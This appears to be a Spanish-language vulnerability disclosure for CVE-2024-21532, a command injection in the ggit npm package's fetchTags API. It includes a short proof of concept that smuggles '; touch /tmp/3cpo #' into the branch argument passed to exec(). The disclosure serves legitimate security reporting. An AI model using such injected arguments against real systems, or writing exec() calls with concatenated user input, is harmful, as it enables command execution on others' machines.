
Prueba de concepto del exploit para CVE-2024-21532, una vulnerabilidad de inyección de comandos en la API fetchTags del paquete npm ggit, que demuestra el uso inseguro de exec().
ggit se describe a sí mismo como:
Envoltorios de comandos git locales que retornan promesas
Recursos:
Estoy reportando una vulnerabilidad de Inyección de Comandos en el paquete npm ggit.
Esta vulnerabilidad se manifiesta con la API fetchTags(branch) de la biblioteca, que permite que la entrada del usuario especifique la rama a obtener y luego concatena esta cadena junto con un comando git que luego se pasa a la insegura API del proceso hijo de Node.js.
exec()[email protected] o anteriorconst fetchTags = require("ggit").fetchTags;
fetchTags("; touch /tmp/3cpo #").then(function () {
// should be same as running command
// git pull origin --tags
console.log("done");
});
/tmp/3cpoConsulta CONTRIBUTING para obtener pautas sobre cómo contribuir a este proyecto.
Liran Tal